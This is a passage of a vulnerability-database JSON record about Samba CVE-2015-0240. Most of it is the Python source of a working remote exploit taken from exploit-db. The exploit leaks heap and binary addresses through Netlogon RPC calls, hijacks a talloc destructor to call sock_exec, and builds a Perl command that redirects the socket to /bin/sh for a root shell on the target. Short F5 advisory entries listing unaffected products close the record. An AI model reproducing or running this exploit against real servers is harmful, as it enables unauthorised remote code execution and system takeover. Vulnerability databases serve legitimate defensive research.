set_payload(payload, TARGET_PAYLOAD_SIZE)\r\n if call_only:\r\n return call_addr(payload_addr + TALLOC_HDR_SIZE + prefix_len)\r\n \r\n for i in range(3 if retry else 1):\r\n try:\r\n answers = request_addr(payload_addr + TALLOC_HDR_SIZE + prefix_len)\r\n except impacket.dcerpc.v5.rpcrt.Exception:\r\n print(\"impacket.dcerpc.v5.rpcrt.Exception\")\r\n answers = None\r\n force_dce_disconnect()\r\n if answers is not None:\r\n # leak info must have next or prev address\r\n if (answers[1] == prev_addr) or (answers[0] == next_addr):\r\n break\r\n #print('{:x}, {:x}, {:x}, {:x}'.format(answers[0], answers[1], answers[2], answers[3]))\r\n answers = None # no next or prev in answers => wrong answer\r\n force_dce_disconnect() # heap is corrupted, disconnect it\r\n \r\n return answers\r\n \r\ndef leak_info_addr(payload_addr, r_out_addr, leak_addr, retry=True):\r\n # leak by replace r->out.return_authenticator pointer\r\n # Note: because leak_addr[4:8] will be replaced with r_out_addr\r\n # only answers[0] and answers[2] are leaked\r\n return leak_info_unlink(payload_addr, leak_addr, r_out_addr, retry)\r\n\r\ndef leak_info_addr2(payload_addr, r_out_addr, leak_addr, retry=True):\r\n # leak by replace r->out.return_authenticator pointer\r\n # Note: leak_addr[0:4] will be replaced with r_out_addr\r\n # only answers[1] and answers[2] are leaked\r\n return leak_info_unlink(payload_addr, r_out_addr-4, leak_addr-4, retry)\r\n\r\ndef leak_uint8t_addr(payload_addr, r_out_addr, chunk_addr):\r\n # leak name field ('uint8_t') in found heap chunk\r\n # do not retry this leak, because r_out_addr is guessed\r\n answers = leak_info_addr(payload_addr, r_out_addr, chunk_addr + 0x18, False)\r\n if answers is None:\r\n return None\r\n if answers[2] != TALLOC_MAGIC:\r\n force_dce_disconnect()\r\n return None\r\n\r\n return answers[0]\r\n\r\ndef leak_info_find_offset(info):\r\n # offset from pool to payload still does not know\r\n print(\"[*] guessing 'r' offset and leaking 'uint8_t' address 
...\")\r\n chunk_addr = info['chunk_addr']\r\n uint8t_addr = None\r\n r_addr = None\r\n r_out_addr = None\r\n while uint8t_addr is None:\r\n # 0x8c10 <= 4 + 0x7f88 + 0x2044 - 0x13c0\r\n # 0x9ce0 <= 4 + 0x7f88 + 0x10d0 + 0x2044 - 0x13c0\r\n # 0xadc8 <= 4 + 0x7f88 + 0x10e8 + 0x10d0 + 0x2044 - 0x13c0\r\n # 0xad40 is extra offset when no share on debian\r\n # 0x10d38 is extra offset when only [printers] is shared on debian\r\n for offset in (0x8c10, 0x9ce0, 0xadc8, 0xad40, 0x10d38):\r\n r_addr = chunk_addr - offset\r\n # 0x18 is out.authenticator offset\r\n r_out_addr = r_addr + 0x18\r\n print(\" [*] try 'r' offset 0x{:x}, r_out addr: 0x{:x}\".format(offset, r_out_addr))\r\n \r\n uint8t_addr = leak_uint8t_addr(info['payload_addr'], r_out_addr, chunk_addr)\r\n if uint8t_addr is not None:\r\n print(\" [*] success\")\r\n break\r\n print(\" [-] failed\")\r\n if uint8t_addr is None:\r\n return False\r\n \r\n info['uint8t_addr'] = uint8t_addr\r\n info['r_addr'] = r_addr\r\n info['r_out_addr'] = r_out_addr\r\n info['pool_addr'] = r_addr - 0x13c0\r\n \r\n print(\" [+] text 'uint8_t' addr: {:x}\".format(info['uint8t_addr']))\r\n print(\" [+] pool addr: {:x}\".format(info['pool_addr']))\r\n \r\n return True\r\n \r\ndef leak_sock_fd(info):\r\n # leak sock fd from\r\n # smb_request->sconn->sock\r\n # (offset: ->0x3c ->0x0 )\r\n print(\"[*] leaking socket fd ...\")\r\n info['smb_request_addr'] = info['pool_addr']+0x11a0\r\n print(\" [*] smb request addr: {:x}\".format(info['smb_request_addr']))\r\n answers = leak_info_addr2(info['payload_addr'], info['r_out_addr'], info['smb_request_addr']+0x3c-4)\r\n if answers is None:\r\n print(' [-] cannot leak sconn_addr address :(')\r\n return None\r\n force_dce_disconnect() # heap is corrupted, disconnect it\r\n sconn_addr = answers[2]\r\n info['sconn_addr'] = sconn_addr\r\n print(' [+] sconn addr: {:x}'.format(sconn_addr))\r\n \r\n # write in padding of chunk, no need to disconnect\r\n answers = leak_info_addr2(info['payload_addr'], 
info['r_out_addr'], sconn_addr)\r\n if answers is None:\r\n print('cannot leak sock_fd address :(')\r\n return None\r\n sock_fd = answers[1]\r\n print(' [+] sock fd: {:d}'.format(sock_fd))\r\n info['sock_fd'] = sock_fd\r\n return sock_fd\r\n\r\ndef leak_talloc_pop_addr(info):\r\n # leak destructor talloc_pop() address\r\n # overwrite name field, no need to disconnect\r\n print('[*] leaking talloc_pop address')\r\n answers = leak_info_addr(info['payload_addr'], info['r_out_addr'], info['pool_addr'] + 0x14)\r\n if answers is None:\r\n print(' [-] cannot leak talloc_pop() address :(')\r\n return None\r\n if answers[2] != 0x2010: # chunk size must be 0x2010\r\n print(' [-] cannot leak talloc_pop() address. answers[2] is wrong :(')\r\n return None\r\n talloc_pop_addr = answers[0]\r\n print(' [+] talloc_pop addr: {:x}'.format(talloc_pop_addr))\r\n info['talloc_pop_addr'] = talloc_pop_addr\r\n return talloc_pop_addr\r\n\r\ndef leak_smbd_server_connection_handler_addr(info):\r\n # leak address from\r\n # smbd_server_connection.smb1->fde ->handler\r\n # (offset: ->0x9c->0x14 )\r\n # MUST NOT disconnect after getting smb1_fd_event address\r\n print('[*] leaking smbd_server_connection_handler address')\r\n def real_leak_conn_handler_addr(info):\r\n answers = leak_info_addr2(info['payload_addr'], info['r_out_addr'], info['sconn_addr'] + 0x9c)\r\n if answers is None:\r\n print(' [-] cannot leak smb1_fd_event address :(')\r\n return None\r\n smb1_fd_event_addr = answers[1]\r\n print(' [*] smb1_fd_event addr: {:x}'.format(smb1_fd_event_addr))\r\n \r\n answers = leak_info_addr(info['payload_addr'], info['r_out_addr'], smb1_fd_event_addr+0x14)\r\n if answers is None:\r\n print(' [-] cannot leak smbd_server_connection_handler address :(')\r\n return None\r\n force_dce_disconnect() # heap is corrupted, disconnect it\r\n smbd_server_connection_handler_addr = answers[0]\r\n diff = info['talloc_pop_addr'] - smbd_server_connection_handler_addr\r\n if diff > 0x2000000 or diff < 0:\r\n 
print(' [-] get wrong smbd_server_connection_handler addr: {:x}'.format(smbd_server_connection_handler_addr))\r\n smbd_server_connection_handler_addr = None\r\n return smbd_server_connection_handler_addr\r\n \r\n smbd_server_connection_handler_addr = None\r\n while smbd_server_connection_handler_addr is None:\r\n smbd_server_connection_handler_addr = real_leak_conn_handler_addr(info)\r\n \r\n print(' [+] smbd_server_connection_handler addr: {:x}'.format(smbd_server_connection_handler_addr))\r\n info['smbd_server_connection_handler_addr'] = smbd_server_connection_handler_addr\r\n \r\n return smbd_server_connection_handler_addr\r\n\r\ndef find_smbd_base_addr(info):\r\n # estimate smbd_addr from talloc_pop\r\n if (info['talloc_pop_addr'] & 0xf) != 0 or (info['smbd_server_connection_handler_addr'] & 0xf) != 0:\r\n # code has no alignment\r\n start_addr = info['smbd_server_connection_handler_addr'] - 0x124000\r\n else:\r\n start_addr = info['smbd_server_connection_handler_addr'] - 0x130000\r\n start_addr = start_addr & 0xfffff000\r\n stop_addr = start_addr - 0x20000\r\n \r\n print('[*] finding smbd loaded addr ...')\r\n while True:\r\n smbd_addr = start_addr\r\n while smbd_addr >= stop_addr:\r\n if addr2utf_prefix(smbd_addr-8) == 3:\r\n # smbd_addr is 0xb?d?e000\r\n test_addr = smbd_addr - 0x800 - 4\r\n else:\r\n test_addr = smbd_addr - 8\r\n # test writable on test_addr\r\n answers = leak_info_addr(info['payload_addr'], 0, test_addr, retry=False)\r\n if answers is not None:\r\n break\r\n smbd_addr -= 0x1000 # try prev page\r\n if smbd_addr > stop_addr:\r\n break\r\n print(' [-] failed. 
try again.')\r\n \r\n info['smbd_addr'] = smbd_addr\r\n print(' [+] found smbd loaded addr: {:x}'.format(smbd_addr))\r\n\r\ndef dump_mem_call_addr(info, target_addr):\r\n # leak pipes_struct address from\r\n # smbd_server_connection->chain_fsp->fake_file_handle->private_data\r\n # (offset: ->0x48 ->0xd4 ->0x4 )\r\n # Note:\r\n # - MUST NOT disconnect because chain_fsp,fake_file_handle,pipes_struct address will be changed\r\n # - target_addr will be replaced with current_pdu_sent address\r\n # check read_from_internal_pipe() in source3/rpc_server/srv_pipe_hnd.c\r\n print(' [*] overwrite current_pdu_sent for dumping memory ...')\r\n answers = leak_info_addr2(info['payload_addr'], info['r_out_addr'], info['smb_request_addr'] + 0x48)\r\n if answers is None:\r\n print(' [-] cannot leak chain_fsp address :(')\r\n return False\r\n chain_fsp_addr = answers[1]\r\n print(' [*] chain_fsp addr: {:x}'.format(chain_fsp_addr))\r\n \r\n answers = leak_info_addr(info['payload_addr'], info['r_out_addr'], chain_fsp_addr+0xd4, retry=False)\r\n if answers is None:\r\n print(' [-] cannot leak fake_file_handle address :(')\r\n return False\r\n fake_file_handle_addr = answers[0]\r\n print(' [*] fake_file_handle addr: {:x}'.format(fake_file_handle_addr))\r\n\r\n answers = leak_info_addr2(info['payload_addr'], info['r_out_addr'], fake_file_handle_addr+0x4-0x4, retry=False)\r\n if answers is None:\r\n print(' [-] cannot leak pipes_struct address :(')\r\n return False\r\n pipes_struct_addr = answers[2]\r\n print(' [*] pipes_struct addr: {:x}'.format(pipes_struct_addr))\r\n \r\n current_pdu_sent_addr = pipes_struct_addr+0x84\r\n print(' [*] current_pdu_sent addr: {:x}'.format(current_pdu_sent_addr))\r\n # change pipes->out_data.current_pdu_sent to dump memory\r\n return leak_info_unlink(info['payload_addr'], current_pdu_sent_addr-4, target_addr, call_only=True)\r\n\r\ndef dump_smbd_find_bininfo(info):\r\n def recv_till_string(data, s):\r\n pos = len(data)\r\n while True:\r\n data += 
force_recv()\r\n if len(data) == pos:\r\n print('no more data !!!')\r\n return None\r\n p = data.find(s, pos-len(s))\r\n if p != -1:\r\n return (data, p)\r\n pos = len(data)\r\n return None\r\n\r\n def lookup_dynsym(dynsym, name_offset):\r\n addr = 0\r\n i = 0\r\n offset_str = pack(\"<I\", name_offset)\r\n while i < len(dynsym):\r\n if dynsym[i:i+4] == offset_str:\r\n addr = unpack(\"<I\", dynsym[i+4:i+8])[0]\r\n break\r\n i += 16\r\n return addr\r\n \r\n print('[*] dumping smbd ...')\r\n dump_call = False\r\n # have to minus from smbd_addr because code section is read-only\r\n if addr2utf_prefix(info['smbd_addr']-4) == 3:\r\n # smbd_addr is 0xb?d?e000\r\n dump_addr = info['smbd_addr'] - 0x800 - 4\r\n else:\r\n dump_addr = info['smbd_addr'] - 4\r\n for i in range(8):\r\n if dump_mem_call_addr(info, dump_addr):\r\n mem = force_recv()\r\n if len(mem) == 4280:\r\n dump_call = True\r\n break\r\n print(' [-] dump_mem_call_addr failed. try again')\r\n force_dce_disconnect()\r\n if not dump_call:\r\n print(' [-] dump smbd failed')\r\n return False\r\n \r\n print(' [+] dump success. 
getting smbd ...')\r\n # first time, remove any data before \\7fELF\r\n mem = mem[mem.index('\\x7fELF'):]\r\n\r\n mem, pos = recv_till_string(mem, '\\x00__gmon_start__\\x00')\r\n print(' [*] found __gmon_start__ at {:x}'.format(pos+1))\r\n \r\n pos = mem.rfind('\\x00\\x00', 0, pos-1)\r\n dynstr_offset = pos+1\r\n print(' [*] found .dynstr section at {:x}'.format(dynstr_offset))\r\n \r\n dynstr = mem[dynstr_offset:]\r\n mem = mem[:dynstr_offset]\r\n \r\n # find start of .dynsym section\r\n pos = len(mem) - 16\r\n while pos > 0:\r\n if mem[pos:pos+16] == '\\x00'*16:\r\n break\r\n pos -= 16 # sym entry size is 16 bytes\r\n if pos <= 0:\r\n print(' [-] found wrong .dynsym section at {:x}'.format(pos))\r\n return None\r\n dynsym_offset = pos\r\n print(' [*] found .dynsym section at {:x}'.format(dynsym_offset))\r\n dynsym = mem[dynsym_offset:]\r\n \r\n # find sock_exec\r\n dynstr, pos = recv_till_string(dynstr, '\\x00sock_exec\\x00')\r\n print(' [*] found sock_exec string at {:x}'.format(pos+1))\r\n sock_exec_offset = lookup_dynsym(dynsym, pos+1)\r\n print(' [*] sock_exec offset {:x}'.format(sock_exec_offset))\r\n \r\n #info['mem'] = mem # smbd data before .dynsym section\r\n info['dynsym'] = dynsym\r\n info['dynstr'] = dynstr # incomplete section\r\n info['sock_exec_addr'] = info['smbd_addr']+sock_exec_offset\r\n print(' [+] sock_exec addr: {:x}'.format(info['sock_exec_addr']))\r\n \r\n # Note: can continuing memory dump to find ROP\r\n \r\n force_dce_disconnect()\r\n \r\n########\r\n# code execution\r\n########\r\ndef call_sock_exec(info):\r\n prefix_len = addr2utf_prefix(info['sock_exec_addr'])\r\n if prefix_len == 3:\r\n return False # too bad... 
cannot call\r\n if prefix_len == 2:\r\n prefix_len = 0\r\n fake_talloc_chunk_exec = pack(\"<IIIIIIIIIIII\",\r\n 0, 0, # next, prev\r\n 0, 0, # parent, child\r\n 0, # refs\r\n info['sock_exec_addr'], # destructor\r\n 0, 0, # name, size\r\n TALLOC_MAGIC | TALLOC_FLAG_POOL, # flag\r\n 0, 0, 0, # pool, pad, pad\r\n )\r\n chunk = '\\x00'*prefix_len+fake_talloc_chunk_exec + info['cmd'] + '\\x00'\r\n set_payload(chunk, TARGET_PAYLOAD_SIZE)\r\n for i in range(3):\r\n if request_check_valid_addr(info['payload_addr']+TALLOC_HDR_SIZE+prefix_len):\r\n print('waiting for shell :)')\r\n return True\r\n print('something wrong :(')\r\n return False\r\n\r\n########\r\n# start work\r\n########\r\n\r\ndef check_exploitable():\r\n if request_check_valid_addr(0x41414141):\r\n print('[-] seems not vulnerable')\r\n return False\r\n if request_check_valid_addr(0):\r\n print('[+] seems exploitable :)')\r\n return True\r\n \r\n print(\"[-] seems vulnerable but I cannot exploit\")\r\n print(\"[-] I can exploit only if 'creds' is controlled by 'ReferentId'\")\r\n return False\r\n\r\ndef do_work(args):\r\n info = {}\r\n \r\n if not (args.payload_addr or args.heap_start or args.start_payload_size):\r\n if not check_exploitable():\r\n return\r\n\r\n start_size = 512*1024 # default size with 512KB\r\n if args.payload_addr:\r\n info['payload_addr'] = args.payload_addr\r\n else:\r\n heap_start = args.heap_start if args.heap_start else 0xb9800000+0x30000\r\n if args.start_payload_size:\r\n start_size = args.start_payload_size * 1024\r\n if start_size < TARGET_PAYLOAD_SIZE:\r\n start_size = 512*1024 # back to default\r\n info['payload_addr'] = find_payload_addr(heap_start, start_size, TARGET_PAYLOAD_SIZE)\r\n \r\n # the real talloc chunk address that stored the raw netlogon data\r\n # serverHandle 0x10 bytes. 
accountName 0xc bytes\r\n info['chunk_addr'] = info['payload_addr'] - 0x1c - TALLOC_HDR_SIZE\r\n print(\"[+] chunk addr: {:x}\".format(info['chunk_addr']))\r\n\r\n while not leak_info_find_offset(info):\r\n # Note: do heap bruteforcing again seems to be more effective\r\n # start from payload_addr + some offset\r\n print(\"[+] bruteforcing heap again. start from {:x}\".format(info['payload_addr']+0x10000))\r\n info['payload_addr'] = find_payload_addr(info['payload_addr']+0x10000, start_size, TARGET_PAYLOAD_SIZE)\r\n info['chunk_addr'] = info['payload_addr'] - 0x1c - TALLOC_HDR_SIZE\r\n print(\"[+] chunk addr: {:x}\".format(info['chunk_addr']))\r\n\r\n got_fd = leak_sock_fd(info)\r\n \r\n # create shell command for reuse sock fd\r\n cmd = \"perl -e 'use POSIX qw(dup2);$)=0;$>=0;\" # seteuid, setegid\r\n cmd += \"dup2({0:d},0);dup2({0:d},1);dup2({0:d},2);\".format(info['sock_fd']) # dup sock\r\n # have to kill grand-grand-parent process because sock_exec() does fork() then system()\r\n # the smbd process still receiving data from socket\r\n cmd += \"$z=getppid;$y=`ps -o ppid= $z`;$x=`ps -o ppid= $y`;kill 15,$x,$y,$z;\" # kill parents\r\n cmd += \"\"\"print \"shell ready\\n\";exec \"/bin/sh\";'\"\"\" # spawn shell\r\n info['cmd'] = cmd\r\n\r\n # Note: cannot use system@plt because binary is PIE and chunk dtor is called in libtalloc.\r\n # the ebx is not correct for resolving the system address\r\n smbd_info = {\r\n 0x5dd: { 'uint8t_offset': 0x711555, 'talloc_pop': 0x41a890, 'sock_exec': 0x0044a060, 'version': '3.6.3-2ubuntu2 - 3.6.3-2ubuntu2.3'},\r\n 0xb7d: { 'uint8t_offset': 0x711b7d, 'talloc_pop': 0x41ab80, 'sock_exec': 0x0044a380, 'version': '3.6.3-2ubuntu2.9'},\r\n 0xf7d: { 'uint8t_offset': 0x710f7d, 'talloc_pop': 0x419f80, 'sock_exec': 0x00449770, 'version': '3.6.3-2ubuntu2.11'},\r\n 0xf1d: { 'uint8t_offset': 0x71ff1d, 'talloc_pop': 0x429e80, 'sock_exec': 0x004614b0, 'version': '3.6.6-6+deb7u4'},\r\n }\r\n\r\n leak_talloc_pop_addr(info) # to double check the 
bininfo\r\n bininfo = smbd_info.get(info['uint8t_addr'] & 0xfff)\r\n if bininfo is not None:\r\n smbd_addr = info['uint8t_addr'] - bininfo['uint8t_offset']\r\n if smbd_addr + bininfo['talloc_pop'] == info['talloc_pop_addr']:\r\n # correct info\r\n print('[+] detect smbd version: {:s}'.format(bininfo['version']))\r\n info['smbd_addr'] = smbd_addr\r\n info['sock_exec_addr'] = smbd_addr + bininfo['sock_exec']\r\n print(' [*] smbd loaded addr: {:x}'.format(smbd_addr))\r\n print(' [*] use sock_exec offset: {:x}'.format(bininfo['sock_exec']))\r\n print(' [*] sock_exec addr: {:x}'.format(info['sock_exec_addr']))\r\n else:\r\n # wrong info\r\n bininfo = None\r\n \r\n got_shell = False\r\n if bininfo is None:\r\n # no target binary info. do a hard way to find them.\r\n \"\"\"\r\n leak smbd_server_connection_handler for 2 purposes\r\n - to check if compiler does code alignment\r\n - to estimate smbd loaded address\r\n - gcc always puts smbd_server_connection_handler() function at\r\n beginning area of .text section\r\n - so the difference of smbd_server_connection_handler() offset is\r\n very low for all smbd binary (compiled by gcc)\r\n \"\"\" \r\n leak_smbd_server_connection_handler_addr(info)\r\n find_smbd_base_addr(info)\r\n dump_smbd_find_bininfo(info)\r\n\r\n # code execution\r\n if 'sock_exec_addr' in info and call_sock_exec(info):\r\n s = get_socket()\r\n print(s.recv(4096)) # wait for 'shell ready' message\r\n s.send('uname -a\\n')\r\n print(s.recv(4096))\r\n s.send('id\\n')\r\n print(s.recv(4096))\r\n s.send('exit\\n')\r\n s.close()\r\n\r\n\r\ndef hex_int(x):\r\n return int(x,16)\r\n \r\n# command arguments\r\nparser = argparse.ArgumentParser(description='Samba CVE-2015-0240 exploit')\r\nparser.add_argument('target', help='target IP address')\r\nparser.add_argument('-hs', '--heap_start', type=hex_int,\r\n help='heap address in hex to start bruteforcing')\r\nparser.add_argument('-pa', '--payload_addr', type=hex_int, \r\n help='exact payload (accountName) address in 
heap. If this is defined, no heap bruteforcing')\r\nparser.add_argument('-sps', '--start_payload_size', type=int,\r\n help='start payload size for bruteforcing heap address in KB. (128, 256, 512, ...)')\r\n\r\nargs = parser.parse_args()\r\nrequester.set_target(args.target)\r\n\r\n\r\ntry:\r\n do_work(args)\r\nexcept KeyboardInterrupt:\r\n pass", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/36741/"}], "f5": [{"lastseen": "2017-06-08T00:16:30", "bulletinFamily": "software", "description": "\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 11.0.0 - 11.6.0 \n10.0.0 - 10.2.4| Not vulnerable| None \nBIG-IP AAM| None| 11.4.0 - 11.6.0| Not vulnerable| None \nBIG-IP AFM| None| 11.3.0 - 11.6.0| Not vulnerable| None \nBIG-IP Analytics| None| 11.0.0 - 11.6.0| Not vulnerable| None \nBIG-IP APM| None| 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP ASM| None| 11.0.0 - 11.6.0 \n10.0.0 - 10.2.4| Not vulnerable| None \nBIG-IP Edge Gateway| None| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP GTM| None| 11.0.0 - 11.6.0 \n10.0.0 - 10.2.4| Not vulnerable| None \nBIG-IP Link Controller| None| 11.0.0 - 11.6.0 \n10.0.0 - 10.2.4| Not vulnerable| None \nBIG-IP PEM| None| 11.3.0 - 11.6.0| Not vulnerable| None \nBIG-IP PSM| None| 11.0.0 - 11.4.1 \n10.0.0 - 10.2.4| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.0.0 - 11.3.0 \n10.0.0 - 10.2.4| Not vulnerable| None \nBIG-IP WOM| None| 11.0.0 - 11.3.0 \n10.0.0 - 10.2.4| Not vulnerable| None \nARX| None| 6.0.0 - 6.4.0| Not vulnerable| None \nEnterprise 
Manager| None| 3.0.0 - 3.1.1 \n2.1.0 - 2.3.0| Not vulnerable| None \nFirePass| None| 7.0.0 \n6.0.0 - 6.1.0| Not vulnerable| None \nBIG-IQ Cloud| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.2.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nLineRate| None| 2.2.0 - 2.5.0 \n1.6.0 - 1.6.4| Not vulnerable| None \nF5 WebSafe| None| 1.0.0| Not vulnerable| None \nTraffix SDC| None| 4.0.0 - 4.1.0 \n3.3.2 - 3.5.1| Not vulnerable| None \n \n**Note**: As of February 17, 2015, AskF5 Security Advisory articles include the Severity value. Security Advisory articles published before this date do not list a Severity value.\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K10942: Installing OPSWAT hotfixes on BIG-IP APM systems](<https://support.f5.com/csp/article/K10942>)\n", "modified": "2016-06-28T22:10:00", "published": "2015-04-02T21:02:00", "id": "F5:K16350", "href": "https://support.f5.com/csp/article/K16350", "title": "Samba vulnerability CVE-2015-0240", "type": "f5", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-26T17:23:04", "bulletinFamily": "software", "description": "Vulnerability Recommended Actions\n\nNone\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated 
documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n * SOL10942: Installing OPSWAT hotfixes on BIG-IP APM systems\n", "modified": "2016-06-28T00:00:00", "published": "2015-04-02T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/16000/300/sol16350.html", "id": "SOL16350", "title": "SOL16350 - Samba vulnerability CVE-2015-0240", "type": "f5", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}